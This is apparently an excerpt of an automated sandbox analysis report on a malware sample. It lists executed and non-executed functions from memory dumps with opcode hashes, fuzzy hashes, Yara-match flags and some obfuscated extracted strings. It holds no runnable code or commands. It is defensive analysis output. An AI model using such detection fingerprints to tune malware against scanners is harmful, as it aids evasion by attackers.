                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-
                                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                        • Instruction ID: a528e4b507bc9821a26097f6ab47d818c3ba8e08da57f7c62f771b3715ead0a2
                                                                                                                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                        • Instruction Fuzzy Hash: BA9198B1E002169BDF2CDF5DC8906BEBBA5BFC4720F14461AE965E72C8D73099418762
                                                                                                                                        Function 010F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $$@
                                                                                                                                        • API String ID: 0-1194432280
                                                                                                                                        • Opcode ID: 74989b935946958397342612ff01ffa0997bd8a6d832899118795d5db5308ec4
                                                                                                                                        • Instruction ID: 4a2cec30b574a655e225c8df85b860ca5703d1e78c583aa45598ae387e2faa84
                                                                                                                                        • Opcode Fuzzy Hash: 74989b935946958397342612ff01ffa0997bd8a6d832899118795d5db5308ec4
                                                                                                                                        • Instruction Fuzzy Hash: CA81FC72D00269DBDB75CB94CC45BEEB7B4AF48754F0041EAAA19B7680D7709E84CFA0

                                                                                                                                        Executed Functions

                                                                                                                                        Function 02DABE16 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 6$O$S$\$s
                                                                                                                                        • API String ID: 0-3854637164
                                                                                                                                        • Opcode ID: b65c54ee091a3920a7efdd9a6a12ef5e8b816e8b8adc51774cd369ed88908ef7
                                                                                                                                        • Instruction ID: cefb4ba923206e5ea8eb8c71db1890c47e25062af8787cd4e9c24bc02067aae3
                                                                                                                                        • Opcode Fuzzy Hash: b65c54ee091a3920a7efdd9a6a12ef5e8b816e8b8adc51774cd369ed88908ef7
                                                                                                                                        • Instruction Fuzzy Hash: 3D519FB2D00219ABDB10EF94DD98FEEB3B8EF54314F04819AE90D66240E7759E45CFA1
                                                                                                                                        Function 02DBA4B6 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: j&vOnt$j&vOnt
                                                                                                                                        • API String ID: 0-1288808581
                                                                                                                                        • Opcode ID: a75ec2a5c1795c830c54f13267713fc780cea8d0a86751adc9d18d29384595ca
                                                                                                                                        • Instruction ID: 9705d5ba1b4f0eed2bb1c2b5da09c3202432637a318493d70bed6811e753d0e2
                                                                                                                                        • Opcode Fuzzy Hash: a75ec2a5c1795c830c54f13267713fc780cea8d0a86751adc9d18d29384595ca
                                                                                                                                        • Instruction Fuzzy Hash: 3411FEB6D01119AF9B00DFA9D8409EEB7F9EF48310F14826AE919E7200E7749A018BA1
                                                                                                                                        Function 02D9E068 Relevance: .5, Instructions: 467COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 603c03c2bfdb35865987a5dd10fdaf09f681b99f7fe2d5407d75602861fbb416
                                                                                                                                        • Instruction ID: 9824efc0f0e7f7884d28719a8ce9d2f2a5617a6cdeecd2510e2f97d97565b5bc
                                                                                                                                        • Opcode Fuzzy Hash: 603c03c2bfdb35865987a5dd10fdaf09f681b99f7fe2d5407d75602861fbb416
                                                                                                                                        • Instruction Fuzzy Hash: 4642CBB0D052A8CBEB24CF54C998BDDBBB2BB45308F1485CAD14A6B381D7B55E89CF41
                                                                                                                                        Function 02D97698 Relevance: .1, Instructions: 145COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a350b383ce13cf3cf99fe273b2dda38dc5e4f5fff1d0810e401e76f357f5eef8
                                                                                                                                        • Instruction ID: f8fc5fe952aeb42eabd5d619afc4b48625887a658dd442702fea488e7bf4cf45
                                                                                                                                        • Opcode Fuzzy Hash: a350b383ce13cf3cf99fe273b2dda38dc5e4f5fff1d0810e401e76f357f5eef8
                                                                                                                                        • Instruction Fuzzy Hash: 23412DB1D11219AFDB14CF99CC81EEEBBB8FF49710F10415AFA14E6240E3B19A41CBA5
                                                                                                                                        Function 02DBC8A6 Relevance: .1, Instructions: 85COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 96a2bb7d17fff6c7e212c1376b52a49f8c0d5cef31a7f08ad5dd112158e2e83a
                                                                                                                                        • Instruction ID: f8b0e5130e90dd6f185e6d7f8a2805599824f26dccd5d5afed97ac9e38ec65ac
                                                                                                                                        • Opcode Fuzzy Hash: 96a2bb7d17fff6c7e212c1376b52a49f8c0d5cef31a7f08ad5dd112158e2e83a
                                                                                                                                        • Instruction Fuzzy Hash: C931B8B5A00609ABDB14DF99CC41EEFB7B9EF89710F108219F919A7340D730A952CFA1
                                                                                                                                        Function 02DBD196 Relevance: .1, Instructions: 77COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 94a82c4498f4d1b0e95ec0b7ea1ca81ca2c7b4922daa7e4067c0b91ec7171abf
                                                                                                                                        • Instruction ID: 99e53ab06d07902959dab9ceb6b67c241fe476f1b44d7a41cf5a3c9fd688e68c
                                                                                                                                        • Opcode Fuzzy Hash: 94a82c4498f4d1b0e95ec0b7ea1ca81ca2c7b4922daa7e4067c0b91ec7171abf
                                                                                                                                        • Instruction Fuzzy Hash: C021EAB5A00609ABDB24DF98DC41EEFB7B9EF89710F108519F91997380D730A911CBB5
                                                                                                                                        Function 02DABC56 Relevance: .1, Instructions: 75COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 16c2821f280891899a9e68313e71bc139bf371e7fafb499ae6d7673af716ad82
                                                                                                                                        • Instruction ID: cf931751c769a09ff013e2d509af1220197209f2ad3661ecc87fcd8a99d2ab0f
                                                                                                                                        • Opcode Fuzzy Hash: 16c2821f280891899a9e68313e71bc139bf371e7fafb499ae6d7673af716ad82
                                                                                                                                        • Instruction Fuzzy Hash: 2A1186723802057BF7219A55CC53FAB376DDF84B54F244015FB04AE3C0E6A4BD128AB5
                                                                                                                                        Function 02DBC6B6 Relevance: .1, Instructions: 65COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 77588f1d4e723a07bc1d332243f565fcf741497e69ec14286f0500eb237ddae1
                                                                                                                                        • Instruction ID: 606a291f2a6aedb2855a6655dba6c5c266318f8a6b8e5b7ce8aef559a8207c7a
                                                                                                                                        • Opcode Fuzzy Hash: 77588f1d4e723a07bc1d332243f565fcf741497e69ec14286f0500eb237ddae1
                                                                                                                                        • Instruction Fuzzy Hash: 52114C75A10615AFD720EFA88C41FEF77ADEF89710F108509F9599B281E77069028BB1
                                                                                                                                        Function 02DB9176 Relevance: .1, Instructions: 65COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2a963d9050a1e0e323f199bfc6479a81a563f6cea96f5f214ffeda0f594bbcad
                                                                                                                                        • Instruction ID: 63f8b63b44e4dc745c899b0e62600d7880fa673d05cf0007207dfaed03d9d936
                                                                                                                                        • Opcode Fuzzy Hash: 2a963d9050a1e0e323f199bfc6479a81a563f6cea96f5f214ffeda0f594bbcad
                                                                                                                                        • Instruction Fuzzy Hash: B02121B6D0121DAF8B00DF99DD409EFB7F9FF88210F14866AE909E7200E7705A118FA1
                                                                                                                                        Function 02DBC536 Relevance: .1, Instructions: 65COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2c73ea9a29ff6fbfe0c2461ad93a56da1e1894cea4a0b0c4cd0c26f7a324048f
                                                                                                                                        • Instruction ID: 55ec32067e9f60e2048aa07cf6575cb8572ed7c4b2157f5d2e05f3ce650c431a
                                                                                                                                        • Opcode Fuzzy Hash: 2c73ea9a29ff6fbfe0c2461ad93a56da1e1894cea4a0b0c4cd0c26f7a324048f
                                                                                                                                        • Instruction Fuzzy Hash: 21111C71A00705AFDB24EFA4CC41FEF77ADEF89710F108509F95997281EB7069128BA1
                                                                                                                                        Function 02D976F7 Relevance: .1, Instructions: 51COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 444c852572614efe245d4bc2c1090a369e8fd526f9a65aeefdd7454c4b313ab4
                                                                                                                                        • Instruction ID: eefb9245bb592759afed9e357716de204c7e3e92726b4bf17e86eb0d71ae4288
                                                                                                                                        • Opcode Fuzzy Hash: 444c852572614efe245d4bc2c1090a369e8fd526f9a65aeefdd7454c4b313ab4
                                                                                                                                        • Instruction Fuzzy Hash: 5211E8B1C21228AF8F04CFA9988459DBFF9FA09720B10865BE828E7340D3714641CF94
                                                                                                                                        Function 02DBD4D6 Relevance: .0, Instructions: 47COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6026bf6cc864f872e0decd95382298bf67d59534e48f70a3e9034452c955bd55
                                                                                                                                        • Instruction ID: 4ebbd22e5f3f3736fd7edfe2aa7806d0266552a2b0418e7a500e81373db67c43
                                                                                                                                        • Opcode Fuzzy Hash: 6026bf6cc864f872e0decd95382298bf67d59534e48f70a3e9034452c955bd55
                                                                                                                                        • Instruction Fuzzy Hash: 6F01C0B2214209BBCB14DF99DC80EDB77AEEF8C710F008208BA09E3241D630EC518BA4
                                                                                                                                        Function 02DB90E6 Relevance: .0, Instructions: 46COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4e75dd162cd450f326c9c721378bea543130eb237317d2c9f3042ee2795566d9
                                                                                                                                        • Instruction ID: b0bc6569875ec6e6030e87eb18f47a710c6daf18d552253b9deae70792ba49d2
                                                                                                                                        • Opcode Fuzzy Hash: 4e75dd162cd450f326c9c721378bea543130eb237317d2c9f3042ee2795566d9
                                                                                                                                        • Instruction Fuzzy Hash: 7E01DBB2D11219AF8B41DFE8D9409EFBBF9AB08300F14866AE519F3200F7745A048FA5
                                                                                                                                        Function 02D9784A Relevance: .0, Instructions: 46COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2065a4a431e6e3fce02c0ed41e313c603c17e1cffa67d2c3586cc606be3259d0
                                                                                                                                        • Instruction ID: 6a68ca3c15b17bf67458a1163079300f91f0ac625bc979522a5f4cffebbb71ba
                                                                                                                                        • Opcode Fuzzy Hash: 2065a4a431e6e3fce02c0ed41e313c603c17e1cffa67d2c3586cc606be3259d0
                                                                                                                                        • Instruction Fuzzy Hash: 81F02BB361424667EB101B6AAC40B96FBCCEB85338F240222F95887341E631D851C7A0
                                                                                                                                        Function 02DBC7B6 Relevance: .0, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 53640a4673118af59d00b1ed5a23bda9d24756024376f34d47fbb2a30d0ff4b3
                                                                                                                                        • Instruction ID: 2cd5fe95b67e1fccf65235db91a463d61d6bbfc63d2930642b9082f1797b27da
                                                                                                                                        • Opcode Fuzzy Hash: 53640a4673118af59d00b1ed5a23bda9d24756024376f34d47fbb2a30d0ff4b3
                                                                                                                                        • Instruction Fuzzy Hash: B7F0F876200215BBDB14DE89DC81EDB77ADEF89710F008419B918A7241D770B9118BB4
                                                                                                                                        Function 02DBD406 Relevance: .0, Instructions: 29COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                                                                        • Instruction ID: cb8d6494c5f7c6d6dd4487d47289f3ba45a43655791c5b87f9ab65fdea562a89
                                                                                                                                        • Opcode Fuzzy Hash: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                                                                        • Instruction Fuzzy Hash: 92E06572200209BBDA20EE98DD41EEB37ADEFC9750F008018F908A7382D670BC108AB5
                                                                                                                                        Function 02DABD76 Relevance: .0, Instructions: 29COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ca1a6a713b3f01840001392278596669daafcc955991422778cdfdd8a1516e09
                                                                                                                                        • Instruction ID: ac567429bc6a9721194769ae2bbd43ca8e187788353ef9511579e63b7f6a7a1e
                                                                                                                                        • Opcode Fuzzy Hash: ca1a6a713b3f01840001392278596669daafcc955991422778cdfdd8a1516e09
                                                                                                                                        • Instruction Fuzzy Hash: 15F08271815208EBDF14CF64D841BDEBBB4EB04324F10476EE8259B3C0E634DB518B81
                                                                                                                                        Function 02DBF276 Relevance: .0, Instructions: 28COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9a487808303671b97c9476ea5ed72f36a694bc16127d787400fee9bfe6dc4c83
                                                                                                                                        • Instruction ID: 4bb21f552506f4dfcb98f0aa048b550ee4a21f0da2e1c75bf802a327764acffa
                                                                                                                                        • Opcode Fuzzy Hash: 9a487808303671b97c9476ea5ed72f36a694bc16127d787400fee9bfe6dc4c83
                                                                                                                                        • Instruction Fuzzy Hash: C8E04F37A402147BC22166899D15FD7775DCFC1B60F054064FE09DB341E660AD018AF5
                                                                                                                                        Function 02DBD106 Relevance: .0, Instructions: 25COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                                                                        • Instruction ID: 1a6fea68cf37842b69a7c90bdc67ab44446363c853b1346864c420640c71ba15
                                                                                                                                        • Opcode Fuzzy Hash: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                                                                        • Instruction Fuzzy Hash: C9E08C36200204BBD620EF59EC40FDB776DEFC6750F408419FA09A7282C6B1B9118BF1
                                                                                                                                        Function 02D9EA05 Relevance: .0, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 98e8aec9bbf6f1a2dbd9f3f4f852b946d92a1087561172c3bca0509e00554ef9
                                                                                                                                        • Instruction ID: d5eb4ba7a1ad57a815d71cb2627663f48c718c1425191a1a74200423e2d2677d
                                                                                                                                        • Opcode Fuzzy Hash: 98e8aec9bbf6f1a2dbd9f3f4f852b946d92a1087561172c3bca0509e00554ef9
                                                                                                                                        • Instruction Fuzzy Hash: FBB012E5022202B04A22338202000016F13DDC12217700E53F081B9311D36109545607

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 02D97458 Relevance: 52.6, Strings: 42, Instructions: 71COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (/2,$)/+2$)2,<$*(5<$*2.'$+2-$$+2/*$-$<O$-),$$-)5$.,-*$/)+2$/*<4$0<pu$2,2.$2./)$4Kur$<4/2$<KSK$<RH<$<^uh$O}zy$P0<p$Qsfu$WTHQ$Wuh3$]llp$l}e3$pp}3$rxyn$s5<_$tnsq$tnsq$u3)/$uwy<$wy<_$xsko$xyzy$y3(/$y<.,$yKy~$}z}n
                                                                                                                                        • API String ID: 0-606234297
                                                                                                                                        • Opcode ID: 233256df4e38f34ade6b8b4be724e10585e00c80c8c83108041821a983508e2a
                                                                                                                                        • Instruction ID: 0907fc32435d0b0a886353260ebb360a6a467551df9491f9c3e399a64c4c348b
                                                                                                                                        • Opcode Fuzzy Hash: 233256df4e38f34ade6b8b4be724e10585e00c80c8c83108041821a983508e2a
                                                                                                                                        • Instruction Fuzzy Hash: 8641DEB4D00358DEDB21DF96EA80ADDBF70BB06340F609698E1986F365C7304A82CF59
                                                                                                                                        Function 02DAEC46 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                                        • API String ID: 0-392141074
                                                                                                                                        • Opcode ID: 3d7a44e086a9f1cc54edf68e767842bd8c68ac6fd64c1b0aac01350b4c2ff7b9
                                                                                                                                        • Instruction ID: e94d1a2793cb4a43e231a15d0b58511f54f62b4879dc87407ef740ae9b4004ef
                                                                                                                                        • Opcode Fuzzy Hash: 3d7a44e086a9f1cc54edf68e767842bd8c68ac6fd64c1b0aac01350b4c2ff7b9
                                                                                                                                        • Instruction Fuzzy Hash: 9271FCB2C10618AEDB25DF94CC90FEEB77EBF48700F044199F509A6250E7755B488FA5
                                                                                                                                        Function 02DA289E Relevance: 15.1, Strings: 12, Instructions: 119COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: AlU$D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                        • API String ID: 0-3057419545
                                                                                                                                        • Opcode ID: 65104fb58f75e1117cf55ea95fb4edef685dd0b4c0daa4bfcb11dbd4a37e0f64
                                                                                                                                        • Instruction ID: bc8d65f916e25df10fa1d8e11b4f22d7f7fe43a367d9e71d9576377e4832f821
                                                                                                                                        • Opcode Fuzzy Hash: 65104fb58f75e1117cf55ea95fb4edef685dd0b4c0daa4bfcb11dbd4a37e0f64
                                                                                                                                        • Instruction Fuzzy Hash: 0B4150B1D01218AEDB10DFA4CC85FEEBBB9FF48704F108159FA09B6240DBB55A448FA4
                                                                                                                                        Function 02D9AFA6 Relevance: 11.3, Strings: 9, Instructions: 43COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $$:$A$Q$R$g$i$v$z
                                                                                                                                        • API String ID: 0-4110582197
                                                                                                                                        • Opcode ID: b3cc2ef84429fa47600e700c5941e51520ebaee9a6eea40694d6ad822ec85025
                                                                                                                                        • Instruction ID: a2e4810675a0a964398c3374ae5b2ffd77d70f2dd7901d00d3757ad769551a50
                                                                                                                                        • Opcode Fuzzy Hash: b3cc2ef84429fa47600e700c5941e51520ebaee9a6eea40694d6ad822ec85025
                                                                                                                                        • Instruction Fuzzy Hash: F511D010D0C7CED9DB12C6BC84087AEBF716F13218F1882D9D4E56B3D2D2BA4656C7A2
                                                                                                                                        Function 02DA9D62 Relevance: 10.1, Strings: 8, Instructions: 130COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
